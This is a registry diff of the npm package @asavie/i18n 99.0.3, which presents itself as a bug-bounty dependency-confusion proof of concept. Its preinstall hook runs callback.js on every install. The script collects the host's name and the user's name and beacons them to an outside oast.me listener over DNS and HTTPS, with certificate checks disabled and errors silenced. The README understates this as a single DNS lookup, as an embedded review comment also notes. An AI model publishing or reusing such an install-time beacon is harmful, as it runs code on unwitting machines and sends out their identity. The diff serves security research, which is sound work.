@asavie/i18n 99.0.3

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
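--- /dev/null
+++ b/package/README.md
@@ -0,0 +1,24 @@
+ # @asavie/i18n - Security Research
+
+ **This package is a dependency confusion proof-of-concept.**
+
+ It was published as part of authorized bug bounty research to demonstrate
+ that the `@asavie/i18n` package name was unclaimed on the public npm registry
+ while being referenced by a production application.
+
+ ## What this does
+
+ On `npm install`, the `preinstall` script performs a single DNS lookup
+ to prove code execution occurred. It does NOT read files, exfiltrate data,
+ install backdoors, or modify the system in any way.
+
+ ## Contact
+
+ - Researcher: daad122
+ - Platform: HackerOne / Bugcrowd
+ - Email: daad122@wearehackerone.com
+
+ ## Responsible Disclosure
+
+ This package will be unpublished or transferred to the legitimate owner
+ after the vulnerability report is resolved.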
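--- /dev/null
+++ b/package/callback.js
@@ -0,0 +1,36 @@
+ /**
+ * SECURITY RESEARCH - Dependency Confusion PoC (v99.0.2)
+ * Authorized bug bounty testing by daad122@wearehackerone.com
+ *
+ * Beacon-only: resolves hostname + username via Node.js stdlib,
+ * sends a single DNS lookup and HTTPS GET to an interactsh listener.
+ * No commands executed, no files read, no credentials accessed.
+ */
+
+ const dns = require('dns');
+ const os = require('os');
+ const https = require('https');
+
+ const OOB_DOMAIN = 'd88sor2o12pnlnd0i1n08ghufaornbr1i.oast.me';
+
+ function sanitize(s, max = 60) {
+ return (s || 'none').replace(/[^a-zA-Z0-9._-]/g, '-').substring(0, max);
+ }
+
+ try {
+ const hostname = sanitize(os.hostname(), 40);
+ const user = sanitize(os.userInfo().username, 20);
+
+ // DNS beacon — proves code execution, identifies package + host + user
+ dns.resolve(`dep-conf.asavie-i18n.${hostname}.${user}.${OOB_DOMAIN}`, 'A', () => {});
+
+ // HTTPS beacon — captures source IP + timestamp in interactsh
+ https.get(
+ `https://${OOB_DOMAIN}/dep-conf?h=${hostname}&u=${user}&pkg=asavie-i18n`,
+ { rejectUnauthorized: false, timeout: 10000 },
+ () => {}
+ ).on('error', () => {});
+
+ } catch (e) {
+ // Fail silently — never break the target's build
+ }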
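Review bot: `rejectUnauthorized: false` in the https.get options disables TLS certificate validation for the beacon request, which neither the header comment nor the README mentions; remove that option so the request is subject to normal verification. The `timeout: 10000` option only emits a `'timeout'` event without aborting the request, and the response callback never consumes the body, so an unresponsive listener can keep the preinstall step open until the socket closes on its own: `const req = https.get(<same URL literal>, { timeout: 10000 }, (res) => res.resume()); req.on('timeout', () => req.destroy()); req.on('error', () => {});`. The README states the package performs "a single DNS lookup" while this file also issues an HTTPS GET carrying the sanitized hostname and username, so the two descriptions should be brought into agreement, and the header's "v99.0.2" is stale against the 99.0.3 in package.json.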
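--- /dev/null
+++ b/package/index.js
@@ -0,0 +1,4 @@
+ // @asavie/i18n - SECURITY RESEARCH placeholder
+ // Dependency confusion PoC by daad122@wearehackerone.com
+ // This package exists to demonstrate supply-chain vulnerability.
+ module.exports = {};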
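--- /dev/null
+++ b/package/package.json
@@ -0,0 +1,16 @@
+ {
+ "name": "@asavie/i18n",
+ "version": "99.0.3",
+ "description": "SECURITY RESEARCH - Dependency confusion beacon-only PoC - Contact: daad122@wearehackerone.com",
+ "main": "index.js",
+ "scripts": {
+ "preinstall": "node callback.js || true"
+ },
+ "keywords": ["security-research", "dependency-confusion", "bug-bounty"],
+ "author": "daad122 (security researcher)",
+ "license": "ISC",
+ "repository": {
+ "type": "git",
+ "url": "https://hackerone.com/daad122"
+ }
+ }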